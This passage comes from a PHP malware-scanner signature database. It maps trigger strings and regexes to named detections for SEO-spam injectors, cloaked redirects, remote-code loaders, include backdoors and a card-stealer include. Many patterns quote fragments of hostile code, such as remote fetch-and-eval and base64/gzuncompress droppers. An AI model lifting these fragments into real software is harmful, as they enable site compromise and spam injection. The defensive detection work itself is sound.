	'file_get_c' => array(STR_TRIGGER,

		'HTTP_USER_AGENT' => array(STR_TRIGGER,

			'header(' => array(STR_TRIGGER,
				'HTTP_ACCEPT_LANGUAGE' => array(STR_TRIGGER,

					'Googlebot' => array(STR_TRIGGER,
						'header("location: " . $url);' => array(STR_TRIGGER,
							'echo $file;' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.047', '\$[\w]+[\s]*=[\s]*\$_SERVER\[.HTTP_ACCEPT_LANGUAGE.\];[\s]*if[\s]*\(preg_match[\s]*\([^\}]+exit\(\);[\s]*\}[\s]*if\(preg_match\(..\([\w]+\|[^\{]+\]\)\)\{[\s]*\$[\w]+[\s]*=[\s]*file_get_contents\(.[^;]+\);[\s]*echo[\s]*\$[\w]+;[\s]*exit;[\s]*\}'),
						),
					),

					'httpbin' => array(STR_TRIGGER,
						'sprintf("<loc>%s</loc>' => array(STR_CLEARFILE, 'php.spam-seo.sitemap_doorway.005', NULL),
					),
				),
			),

			'\'google\') !==' => array(STR_TRIGGER,
				'\'Yahoo! Slurp\') !== false){' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injection.099', '(\$\w+)\s*=\s*false;(\$\w+)\s*=\s*\$_SERVER\[.HTTP_USER_AGENT.\];\s*if\(strpos\(\2,\s*.google.\)[^\{]+\{\s*\1\s*=\s*true;\s*\}\s*if\(\1[^\'"]+.http:[^;]+;\s*echo\s*\$\w+\;\s*\}'),
				'strtolower($_SERVER[\'HTTP_USER_AGENT\']);if (strpos' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injection.102', '\$[\w]+[\s]*=[\s]*strtolower\(\$_SERVER\[.HTTP_USER_AGENT.\]\);[\s]*if[\s]*\(strpos[\s]*\(\$[\w]+,[\s]*.[\w]+.\)[\s]*!==[\s]*false[^\{]+\{\$[\w]+[\s]*=[\s]*@file_get_contents\([\s]*base64_decode[\s]*\(.[^;]+\)\);[\s]*echo[\s]*\$[\w]+\?\$[\w]+:@file_get_contents\([\s]*base64_decode\([^\)]+\)\);\}'),
			),

			'foreach ($os_array as $regex => $value)' => array(STR_TRIGGER,
				'($details && $details->geoplugin_countryName != null)' => array(STR_CLEARFILE, 'php.phishing.script.001', NULL),
				'if (substr_count($hostname, $word) > 0) {' => array(STR_CLEARFILE, 'php.phishing.redirect.037', NULL),
			),

			'$query = $_SERVER[\'REQUEST_URI\'];' => array(STR_TRIGGER,
				'if(stripos($_SERVER[\'HTTP_USER_AGENT\'], \'Googlebot\')' => array(STR_TRIGGER,
					'echo \'<script>document.location=(' => array(STR_TRIGGER,
						'if(isset($query) && preg_match($regex,$query)){' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.201', '\$regex [^;]+;\s*\$query *= *\$_SERVER\[.REQUEST_URI[^\$]+if *\( *strstr\(\$query,.sitemaps?\.xml[^\}]+\}\s*if\(stripos\(\$_SERVER\[.HTTP_USER_AGENT.\], .Googlebot.\)[^<]+(echo .<script>document.location=)[^\!]+if\(\$_GET\[.uu.]!=""\){\s*\1[^\{]+function GetFileContent[^\@]+return \$file_contents;\s*\}'),
					),
				),
			),

			'if(!empty($_SERVER[\'HTTP_USER_AGENT' => array(STR_TRIGGER,
				'file_get_contents(\'http' => array(STR_TRIGGER,
					'$userAgents = array("Google", "Slurp"' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.174', 'if\(!empty\(\$_SERVER\[\'HTTP_USER_AGENT\'[^{]+\{\s*\$userAgents[^"]+"Google[^)]+\);\s*if\(preg_match\(\'[^.]+\.\simplode[^{]+\{\s*\$\w+\s=\sfile_get_contents[^)]+\);\s*echo\s*\$\w+;\s*\}\s*\}'),
				),
			),

			'$str = file_get_contents($' => array(STR_TRIGGER,
				'ini_set("user_agent",$_SERVER[HTTP_USER_AGENT]);' => array(STR_TRIGGER,
					'."?http://".$_SERVER[\'HTTP_HOST\'].$_SERVER["REQUEST_URI"]);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.168', 'ini_set..user_agent..\\$_SERVER[^;]+;[\\s]*\\$[\\w]+=base64_decode[^;]+;[\\s]*echo[\\s]*\\$[\\w]+[\\s]*=[\\s]*file_get_contents\\(\\$[^;]+;'),
				),
			),

			'(ereg("Googlebot"' => array(STR_TRIGGER,
				'$file = file_get_contents(' => array(STR_TRIGGER,
					'echo $file;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.237', 'if[\s]*\(ereg\("Googlebot",[\s]*\$_SERVER\["HTTP_USER_AGENT"\]\)\)[\s]*\{[\s]*\$file[\s]*=[\s]*file_get_contents\([^;]+;[\s]*echo \$file;[\s]*exit;[\s]*\}[^>]+Header\("Location[^;]+\);[\s]*exit;[\s]*}'),
				),
			),

			'$indextitle' => array(STR_TRIGGER,
				'$productid=str_replace(\'.html\',\'\',$productid);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.093', NULL),
			),

			'preg_match ("/(google|ask|yahoo|youtube|wikipedia' => array(STR_TRIGGER,
				'echo "<script type=\'text/javascript\'>setTimeout(\"window.location=\'" .' => array(STR_CLEARFILE, 'php.spam-seo.redirect_gen.019', NULL),
			),

			'if(isgoogle() or strpos($useragent, \'google\') or strpos($useragent, \'yahoo\') or strpos($useragent, \'msn\') or strpos($useragent, \'bing\') or strpos($useragent, \'bot\')){ } else { $return = true' => array(STR_TRIGGER,
				'echo \'AliBots WP' => array(STR_CLEARFILE, 'php.spam-seo.redirect.069', NULL), //Improved by Luke Leal
			),

			'function PlgSystemXcalendar(&' => array(STR_TRIGGER,
				'class PlgSystemXcalendarJoomlaBase extends PlgSystemXcalendarBase {' => array(STR_CLEARFILE, 'php.malware.xcalendar.001', NULL),
			),

			'if(preg_match("/zh-cn' => array(STR_TRIGGER,
				'if(stristr($_SERVER[\'HTTP_USER_AGENT\'],\'Googlebot\')||stristr($_SERVER[\'HTTP_USER_AGENT\'],\'yahoo\')||stristr' => array(STR_CLEARFILE, 'php.spam-seo.injector.310', NULL),
			),

			'stripos($useragent, \'googlebot\') || ' => array(STR_TRIGGER,
				'$url = $host."?count=".$count_url."&static=' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.generic.030', '\$count_url[\s]*=[\s]*[\d]+;[^\$]*\$static[^\{]+function[\s]*geturl[^>]+mainwork\(\$url\);[\s]*\}'),
			),

			'preg_match_all("/(<title[^>]*>)(.*?)(<\/title>)' => array(STR_TRIGGER,
				'shell_test' => array(STR_CLEARFILE, 'php.malware.curl.027', NULL),
			),

			'explode("/",$_GET[' => array(STR_TRIGGER,
				'&& !strstr(strtolower(\$_SERVER[' => array(STR_CLEARFILE, 'php.malware.redirect.035', NULL),
			),

			'.$_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'] .\'QQQ\'. $_SERVER[\'HTTP_USER_AGENT\'].\'QQQEND\',false,$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.link_injector.009', 'if\s*\(\!defined\(.CREDIT.\)\)\s*{\s*\$\w+\s*=\s*stream_context_create\(array\([^;]+;\s*try{\s*\$\w+\s*=\s*\@file_get_contents\(.http(s)?:[^$]+\$_SERVER\[.SERVER_NAME.\]\s*\.\s*\$_SERVER\[.REQUEST_URI.\][^\$]+\$_SERVER\[.HTTP_USER_AGENT.\][^;]+;\s*}\s*catch\s*\(Exception\s*\$\w+\)\s*{\s*}\s*echo\s*\$\w+;\s*define\(.CREDIT.,[^;]+;\s*}'),
			"ini_set('user_agent','Mozilla/5.0 " => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.165', '(\$\w+)\s*=\s*[^;]+\$_SERVER..HTTP_USER_AGENT[^>]+if\s*[^\{]+(strpos\(\1,.(bot|spider|Googlebot|google))[^\}]+ini_set\(.user_agent[^\{]+(\$\w)\s=\sfile_get_contents\(\$\w+[^>]+echo\s\4;[^{]+else\s*\{\s*\}'),
			'array(); preg_match("/RewriteRule' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.172', 'error_reporting\(\d\);[\s]*(\$[\w]+[\s]*=[^;]+;[\s]*)+[^#]+#[^:]+preg_replace[^>]+[^#]+[^:]+[^$]+\$[O0_]{5,}[^#]+[^$]+\$return[Vv]al[\s]*=[\s]*str_replace[^,]+,[\s]*rand[^}]+}[\s]*return[\s]*\$return[Vv]al;[\s]*}'),
			'google-analiytics.com' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.analiytics.001', '<\?php[^>]+google-analiytics.com[^>]+mainwork\(\$url\);\s*\}\s*\?>'),
			'$_SERVER["REMOTE_ADDR"]))$isbot = 1;' => array(STR_CLEARFILE, 'php.spam-seo.header_location.022', NULL),
			'preg_replace("(<{$tag_val[\'tag\']}.*?>)","$0 {$link}",$tag_content_new' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.doorway-gen.095', 'if\(!class_exists\([^\{]+\{if\(function_exists\(.is_user_logged_in.\)\)[\s]*\{[\s]*if\(is_user_logged_in\(\)\)[\s]*\{[\s]*return false;\}[\s]*\}[^\n]+ratel->init\([^\}]+;\}'),
			'first=first&"if instr(1,s_agent,""googlebot' => array(STR_CLEARFILE, 'asp.spam-seo.injector.020', NULL),
			')||stristr(@$_SERVER["HTTP_REFERER"],"google' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.119', 'set_time_limit\([\d]\);[\s]*if\(stripos\(\$_SERVER\[.HTTP_USER_AGENT.\],.[\w]+.\)[\s]*==[\s]*true[\s]*[^@]+echo[\s]*\$file;[\s]*exit;[\s]*\}[\s]*if\(stristr\(@\$_SERVER\[.HTTP_REFERER.\],[^\{]+stristr\(@\$_SERVER\[.HTTP_REFERER.\],.[\w]+.\)\)[\s]*\{[\s]*header\(.[L|l]ocation[^\}]+\);[\s]*exit;[\s]*\}'),
		),

		'echo $content' => array(STR_TRIGGER,

			'$contents = file_get_contents($url);' => array(STR_TRIGGER,
				'x73\x63\x72\x69\x70\x74\x3E"];document.writeln(_$[0]); </script>' => array(STR_CLEARFILE, 'php.spam-seo.injector.162', NULL),
				'$url = "http:' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.038', '\$url = "http:[^;]+;\s*\$contents = file_get_contents..url.;\s*echo \$contents;'),
			),

			'if($content!="no"){' => array(STR_TRIGGER,
				'$page = substr($page,0,strlen($page)-1);' => array(STR_CLEARFILE, 'php.spam-seo.injector.253', '[\s]exec\([^;]+x[a-f0-9]{2}[^>]+\);exit;'),
			),

			'php_display($remote)' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.072', NULL),
			'str_replace($list[$i]["id"],$list[$i]["v"],$' => array(STR_CLEARFILE, 'php.spam-seo.injector.241', NULL),
			'if(isset($_GET[\'check\'])){' => array(STR_CLEARFILE, 'php.spam-seo.injector.305', NULL),
		),

		');exit;' => array(STR_TRIGGER,

			'/i",$_SERVER["HTTP_USER_AGENT"]' => array(STR_TRIGGER,
				'!trim($_SERVER[\'HTTP_USER_AGENT\'])){return false;}$is_bot=0;if(@preg_match("/(googlebot' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.082', NULL),
			),

			'echo $file;' => array(STR_TRIGGER,
				'.php");exit;}' => array(STR_CLEARFILE, 'php.spam-seo.redirect.120', NULL),
			),

			'.jpg\');exit;' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.generic.032', '\n\s*if\s*\(\s*\$_SERVER..REQUEST_URI..\s*==[\'"][^\)]+\)\s*\{\s*echo\s*file_get_contents\(\s*[\'"][^\)]+\/[^\."\']+\.jpg["\']\s*\);exit;\s*\}'),
			'$sh==\'127.0.1.5' => array(STR_CLEARFILE, 'php.spam-seo.header_location.024', NULL),
			'echo "ok-ok";exit;' => array(STR_CLEARFILE, 'php.spam-seo.injector.205', NULL),
			'}($xml_link);$google=@$_SERVER{' => array(STR_CLEARFILE, 'php.spam-seo.injector.294', NULL),
		),

		'$_SERVER[\'PHP_SELF\'];' => array(STR_TRIGGER,

			'charset=gb2312' => array(STR_TRIGGER,
				'@end(explode(' => array(STR_CLEARFILE, 'php.spam-seo.injector.306', NULL),
				'\.[\s]*\$_SERVER\[[^\]]+\][\s]*\.[\s]*\$_SERVER\[.PHP_SELF.\];' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.163', '<\?php[^{]+header\([^\)]+charset[\s]*=[\s]*gb2312.\);[^>]+\.[\s]*\$_SERVER\[.PHP_SELF.\];[^#]+echo \$[\w]+;[^>]+\?>'),
			),

			')!== false||strpos($' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.029', NULL),
		),

		'if (function_exists(\'file_get_contents' => array(STR_TRIGGER,
			'absolute;' => array(STR_TRIGGER,
				'top: -' => array(STR_TRIGGER,
					'left: -' => array(STR_TRIGGER,
						'echo $result;' => array(STR_TRIGGER,
							'curl_setopt($ch, CURLOPT_URL, $url);' => array(STR_TRIGGER,
								'$result = file_get_contents($url);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.hidden-div.005', '<div style="position:[\s]*absolute;[\s]*(top|left):[\s]*-[\d]+px;[^>]+>[\s]*<.php[\s]*\$url[\s]*=[^;]+;[\s]*if[\s]*\(function_exists..file_get_contents.\)\)[\s]*\{[\s]*\$result = file_get_contents[^>]+echo \$result;[\s]*\?>[\s]*<.div>'),
							),
						),
					),
				),
			),
		),

		'".md5(@$_SERVER[\'REQUEST_URI\']));' => array(STR_TRIGGER,
			'@function_exists("curl_init")."=".@ini_get("allow_url_fopen");' => array(STR_TRIGGER,
				'|google|' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.198','if.isset.\$_GET\[.[\w]+.\]\)\)[\s]*\{[\s]*echo[^>]+md5\(@\$_SERVER..REQUEST_URI.\]\)\);\}\}'),
			),
		),

		'$links = file_get_contents("$server");' => array(STR_TRIGGER,
			'$donor = $_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.139', '\\$donor = \\$_SERVER..SERVER_NAME...._SERVER..REQUEST_URI..;[^$]*\\$server = .http[^;]+donor.;[^$]*\\$links[^;]+server..;[^$]*echo .links;'), 
		),

		'$actual_redir_url=trim(@file_get_contents(base64_decode($e2)));' => array(STR_TRIGGER,
			'Header ("Location: ".$out_url);' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.013', NULL),
		),

		'$file_extend=".html";' => array(STR_TRIGGER,
			'$body= file_get_contents($url_full);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.048', NULL),
		),

		'$tpl' => array(STR_TRIGGER,
			'_agents_to_filter' => array(STR_CLEARFILE, 'php.spam-seo.injector.199', NULL),
		),

		'if (( preg_match (\'/Trident/i\', $useragent) && !preg_match' => array(STR_TRIGGER,
			'http://"."logs"."http".".com/"."logs/?ip=' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.188', 'error_reporting\(0\);.*\$alllink=.http:\/\/.\..logs.\..http.\..\.com\/.*\@file_get_contents\(\$alllink\).*echo \$headbnr;\}'),
		),

		'<?php header(\'Location:' => array(STR_TRIGGER,
			'api.php?apitoken=' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.053', '^\<\?php[\s]*\$[^;]+[\s]+=[\s]+file_get_contents\([\'"][^;]+\;[\s]*header\(["\']location[^;]+\;[\s]*\?\>[^;]+header\([\'"][^;]+\;\?\>'),
		),

		'include stream_get_meta_data(' => array(STR_TRIGGER,
			'gzuncompress(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.gzuncompress.004', '(\$\w+)\s*=\s*file_get_contents[^;]+;\s*(\$\w+)\s*=\s*tmpfile\(\);\s*fwrite\(\s*\2,\s*gzuncompress\(\s*\1\s*\)\s*\);\s*include\s*stream_get_meta_data\(\2\)[^;]+;'),
		),

		'_header_response = @get_headers($' => array(STR_TRIGGER,
			'$LicChkURL_header_response[0], "200"' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.generic.031', '<\?php\s*\$\w+\s*=\s*[\'"]https?:\/\/[^;]+;\s*\$[^@]+@get_headers\([^;]+;\s*if\s*\(strpos\(\$[^{]+\{\s*echo file_get_contents\(\$[^}]+}\s*\?>'),
		),

		'$idruri = $_SERVER[\'REQUEST_URI\'];' => array(STR_TRIGGER,
			'chmod($gml.DIRECTORY_SEPARATOR.\'.htaccess\', 0644);' => array(STR_CLEARFILE, 'php.spam-seo.injector.200', NULL),
		),

		'unlink ( \'./.htaccess\' ); file_put_contents ( \'./.htaccess' => array(STR_TRIGGER,
			'file_get_contents ( \'./.htaccess\' ), \'RewriteRule .* index.php [L]' => array(STR_CLEARFILE, 'php.spam-seo.injector.264', NULL),
		),

		'=file_get_contents($dor_dir);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.036', '(\\$dor_[\\w]+=[^;]+;[\\s]*){1,}[\\s]*\\$[\\w]+=file_get_contents.\\$dor_dir[^@]+@mysql_connect[^+]+\\+strlen[^}]+return \\$ttxt;[\\s]*}'),
		'=file_get_contents("$root/$rnd_file");' => array(STR_CLEARFILE, 'php.spam-seo.injector.226', NULL),
		'if (($result = file_get_contents(\'http://\' . $sum . \'-' => array(STR_CLEARFILE, 'php.spam-seo.injector.082',NULL),
		'$redirectContext = file_get_contents(REDIRECT_DOMAIN.\'/\'.(isset($_GET[\'key\'])?$_GET[\'key\']:\'\'));' => array(STR_CLEARFILE, 'php.spam-seo.injector.093', NULL),
		'@file_get_contents(\'http://\'.$hosting_domain.$file."?host=$host&ip=$ip&ua=$ua&ref=$ref");' => array(STR_CLEARFILE, 'php.spam-seo.injector.123', NULL),
		'trim(file_get_contents(dirname(__FILE__).\'/../bin/.zdaccess' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.001', NULL),
		'file_put_contents($fileaddr,gzuncompress(base64_decode(file_get_contents("http://".$_GET["s"]."/ins/".$z[$i]))));}' => array(STR_CLEARFILE, 'php.spam-seo.generic.001', NULL),
		'$wp__theme_icon=@create_function' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.generic.008', '.wp__theme_icon=.create_function...,.file_get_contents...*;.wp__theme_icon..;'),
		'$arrquery[1],file_get_contents(\'http://\'.$sites.\'/search.php?\'.$arrquery[0])));' => array(STR_CLEARFILE, 'php.spam-seo.redirect.034', NULL),
		';echo$str = @file_get_contents($file);' => array(STR_CLEARFILE, 'php.spam-seo.injector.125', NULL),
		'echo kalem(\'http://\'.$_SERVER[\'HTTP_HOST\'].dirname($_SERVER[\'PHP_SELF\']).\'/request.php?token' => array(STR_CLEARFILE, 'php.spam-seo.injector.157', NULL),
		'$str_hm = curl_get_from_webpage_one_time("http:' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.015', NULL),
		'if(!empty($_GET["inf0"])){$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.177', 'if.!empty.._GET..inf0..\\)\\)\\{\\$[^;]+;[\\s]*\\$[\\w]+[\\s]*=[\\s]*file_get_contents[^}]+preg_replace.\\$[\\w]+,\\$[\\w]+,""\\);[\\s]*}}'),
		'if (preg_match("/[^\/]+\.html$/", $url) and file_exists' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.187', '\$\w+=.wp-admin[^;]+;\s*\$url+=\$_SERVER\[.REQUEST_URI.];\s*if\s*\(preg_match\(..\[\^..\]\+..html\$..,\s*\$url\)\s*and\s*file_exists\(\$\w+ \. \$\w+\)\) \{\s*\$content = file_get_contents\(\$\w+ \. \$\w+\);\s*echo \$content;\s*exit\(\);\s*}'),
		'.txt";$t="";if(preg_match_all(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.003.02', 'srand\(\d+\);[\s]*\$to=300;\$u="http:..[^;]+.txt";\$t="";if\(preg_match_all\([^>]+>[^}]+exit;[\s]*\}'),
		'(\$[\w]+) = "http[^;]+;[\s]*\$[\w]+ = file_get_contents\(\1\);[\s]*echo \$[\w]+;' => array(REX_CLEAR_MULTIMATCH, 'rex.spam-seo.injector.225', '(\$[\w]+) = "http[^;]+;[\s]*\$[\w]+ = file_get_contents\(\1\);[\s]*echo \$[\w]+;'),
		'@header(\'Location:\'.$f[$_GET[\'id\']]);' => array(STR_CLEARFILE, 'php.spam-seo.redirect.105', NULL), 
		'echo "-=IDB=-$id-=IDE=-\n"' => array(STR_CLEARFILE, 'php.hacktool.phonehome.002', NULL),
		'if( !isset($local_array[\'hash\']) || isset($local_array[\'hash\']) && $local_array[\'hash\'] != $hash_file )' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.301', '\$arrays[\s]*=[\s]*loadLinks\(\);[\s]*\$[\w]*[\s]*=[\s]*getLinkToCurrentPage\([\s]*\$arrays[\s]*\);[\s]*\$[\w]*[\s]*=[\s]*\[\];[\s]*foreach[^\*]+\$[\w]+[\s]*=[\s]*file_get_contents\(\$_SERVER\[.DOCUMENT_ROOT.\][\s]*.[\s]*[^|]+if\([\s]*preg_match\(.\|[^\}]+\}[\s]*else[\s]*\{[\s]*if\([\s]*strlen\(\$[\w]+\)[\s]*<[^-]+\[count\(\$arrays\)-[\d]*\][\s]*\[.[\w]+.\]\[\][\s]*=[\s]*\$[\w]*;[\s]*\}[\s]*\}[\s]*\}[\s]*return[\s]*\$[\w]+;[\s]*}'),
		'@json_decode(@file_get_contents(content_file), true);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.065', 'define\(.content_file.,[^@]+@file_get_contents\(content_file\);[^#]+file_get_contents\(__FILE__\);[\s]*\$[\w]+[\s]*=[\s]*preg_replace\(.#[^@]+@wp_content_data\(\);[^:]+:[\s]*wp_content_ping\(\);[^\}]+break;[\s]*\}[\s]*die\(\);[\s]*\}'),
		'if(md5(file_get_contents(__FILE__))!=$_POST[\'md5_new_set\']){' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.108', NULL),
		'$_SESSION[\'ANONISMA-' => array(STR_CLEARFILE, 'php.phishing.redirect.008', NULL),
		'curl_setopt ( $ch, CURLOPT_URL, "http://www.love8.pw' => array(STR_CLEARFILE, 'php.spam-seo.injector.200.02', NULL),
		'if (preg_match("/googlebot/i",  $_SERVER["HTTP_USER_AGENT"]' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.header_location.031', '(\$\w+)\s*=\s*\$_SERVER\[.HTTP_ACCEPT_LANGUAGE.\][^\(]+\(preg_match\([^,]+,\s*\1\s*\)\s*\|\|[^;]+;\s*header\([\'"][Ll]ocation:\s*[\'"]\s*\.\s*\$\w+\s*\)\s*;\s*}\s*elseif\s*\(\s*preg_match\([^_]+_match\([^_]+error_reporting\(0\)\s*;\s*if\s*\(\s*preg_match\([^\$]+\$_SERVER\[.HTTP_USER_AGENT.\]\s*\)\)\s*{\s*(\$\w+)\s*=\s*file_get_contents\([^;]+;\s*echo\s*\2\s*;\s*exit\s*;\s*}\s*if\s*\(stripos\(\$_SERVER\[.HTTP_REFERER.\][^{]+{\s*[Hh]eader\([\'"][Ll]ocation:\s*http[^;]+;\s*exit\s*;\s*}'),
		'array(\'http\' => array(\'method\' => "GET' => array(STR_CLEARFILE, 'php.spam-seo.injector.304', NULL),
		'].$http_type.$_SERVER[$GLOBALS{' => array(STR_CLEARFILE, 'php.spam-seo.injector.307', NULL),
	),

	'($dor_way);' => array(STR_TRIGGER, 

		'$cont .= \'function get_content2' => array(STR_TRIGGER,
			'$files_to_write' => array(STR_CLEARFILE, 'php.spam-seo.remote_dor_contnet.001.02', NULL),
		),

		'$dor_content=get_content2($dor_way);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.remote_dor_contnet.001', '\$dor_dir[\s]*=[\s]*.http[^;]+;[\s]*function get_content[^\n]+die\(\);[\s]*\}'),
	),

	'$wpdb->query($' => array(STR_TRIGGER, 
		'= "SHOW TABLES LIKE \'%\'"' => array(STR_TRIGGER,
			'= "DROP TABLE IF EXISTS' => array(STR_CLEARFILE, 'php.hacktool.mysql_drop.003', NULL),
		),
	),

	'(strpos($useragent' => array(STR_TRIGGER,
		'function get_naps_bot()' => array(STR_CLEARFILE, 'php.spam-seo.redirect.008', NULL),
	),

	'<?php get_footer(); ?><a style="left:-' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.057', '<a style="left:-[\\d]{3,}[\\s]*px;[^<]+<.a>'),
	'$GLOBALS[\'user_func\'] = @create_function( \'\', \'};\'.$value' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.117', '..Set the user_func[^\\.]+\\.[\\s]*\\$row = \\$wpdb->get_row[^;]+\\) \\);[\\s]*[^}]+\\$GLOBALS..[\\w]+.. = .create_function....,..};...value.......;[\\s]*}'),
	'widget_options = array(), $control_options = array(), $unique_id = "\x62' => array(STR_CLEARFILE, 'php.spam-seo.fake-blogroll.001', NULL),
	'$str = stripslashes(\'<?php' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.016','\$str\s+.\s+stripslashes[^>]+\$a\s+.\s+array[^>]+\$b\s+.\s+create_function[^>]+b...FZvHj[^>]+>..;[^>]+dir\s+.\s+ABSPATH[^;]+wp-content[^>]+class-image.php[^;]+;[^>]+get_leaf_dirs[^>]+entry\s+.\s+.d->read[^>]+d->close[^\}]+;\}'),
	'</iframe>";<?php get_header();' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.iframer.002', 'print "<iframe src=[^>]+><.iframe>";'),
	'<\?php[\s]*(\$[\w]+)[\s]*=[\s]*file_get_contents\(.http[^;]+\);[\s]*eval\(\1\);[\s]*\?>' => array(REX_CLEAR_MULTIMATCH, 'php.spam-seo.injector.234', '<\?php[\s]*(\$[\w]+)[\s]*=[\s]*file_get_contents\(.http[^;]+\);[\s]*eval\(\1\);[\s]*\?>'),
),

'include' => array(STR_TRIGGER,

	'@include' => array(STR_TRIGGER,

		'/wp-load.php' => array(STR_PATH_TRIGGER,

			'if[\s]*\(is_file\([^\)]+\)\)[\s]*@inc' => array(REX_TRIGGER,
				'@inc' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.056.02', 'if[\s]*\(is_file\([^\)]+\)\)[\s]*@include[^;]+;'),
			),

			'@inc' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.056', '@include[^;]+;'),
		),

		'index.php' => array(STR_PATH_TRIGGER,
			'* Front to the WordPress' => array(STR_TRIGGER,
				'@include \'./wp-' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.049', '\@include\s*[\'"]\.\/wp-(?:includes|content|admin)\/[^;]+;'),
			),
		),

		'($_REQUEST[chr(' => array(STR_TRIGGER,
			'@unlink($' => array(STR_TRIGGER,
				'@array_diff_ukey(@array(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.262', '\$[\w]+[\s]*=[\s]*chr\([^\)]+\)[\s]*\.[\s]*chr\([^@]+\$_REQUEST\[chr\([^;]+;[\s]*@[\w]+[^;]+;[\s]*@include\([^;]+;[\s]*@unlink[^;]+;'),
			),
		),
	
		'DB_PASSWORD' => array(STR_TRIGGER,
			'post_status=\'publish' => array(STR_TRIGGER,
				'stripslashes(urldecode($_POST[' => array(STR_CLEARFILE, 'php.backdoor.wp-posts.002', NULL),
			),
		),

		'// Edit and deleting this code is not recommended!' => array(STR_TRIGGER,
			'@include( ABSPATH . WPINC . \'/' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.048', '\/\/ Edit and deleting this code is not recommended![\s]*@include[^;]+\);'),
		),

		'<?php @include_once(' => array(STR_TRIGGER,
			'<\?php @include_once\([^;]+\/[^;]+\/[^;]+\/[^;]+\/[^;]+\/[^;]+\);[\s]*\?>' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.055', '<\?php @include_once\([^;]+\/[^;]+\/[^;]+\/[^;]+\/[^;]+\/[^;]+\);[\s]*\?>'),
		),

		'<?php @include_once "' => array(STR_TRIGGER,
			'<\?php @include_once "[^;]+\\\\x[^;]+\\\\x[^;]+\\\\x[^;]+\\\\x[^;]+\\\\x[^;]+";[\s]*\?>' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.061', '<\?php @include_once "[^;]+\\\\x[^;]+\\\\x[^;]+\\\\x[^;]+\\\\x[^;]+\\\\x[^;]+";[\s]*\?>'),
			'<\?php[\s]*@include_once[\s]*.[^;]+;[\s]*if[\s]*\(!defined\([^\}]+true\);[\s]*\}[\s]*\?>' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.062', '<\?php[\s]*@include_once[\s]*.[^;]+;[\s]*if[\s]*\(!defined\([^\}]+true\);[\s]*\}[\s]*\?>'),
		),

		'@include(\'wp-admin/css/css.php\');' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.022', '@include\(.wp-admin.css.css.php.\);'),
		'$logger = @$_REQUEST' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.058.02', '\$logger\s*\=\s*@\$_REQUEST\[.\w+.\]\;\s*@include\(\$logger\)\;'),
		'\s{20}<\?php\s\@include\(.[^;]*\/[^;]+\.php.\);\s\?>' => array(REX_CLEAR_MULTIMATCH, 'rex.include_malware.001', '\s{20}<\?php\s\@include\(.[^;]*\/[^;]+\.php.\);\s\?>'),
		'@include[^;\n]+\\\\[\d]{3}[^;\n]+\\\\[\d]{3}[^;\n]+\\\\[\d]{3}[^;\n]+\\\\[\d]{3}[^;\n]+;' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.043', '@include[^;\n]+\\\\[\d]{3}[^;\n]+\\\\[\d]{3}[^;\n]+\\\\[\d]{3}[^;\n]+\\\\[\d]{3}[^;\n]+;'),
		'<\?php[\s]{40,}@include_once' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.044', '[\s]{40,}@include_once[^;]+;'),
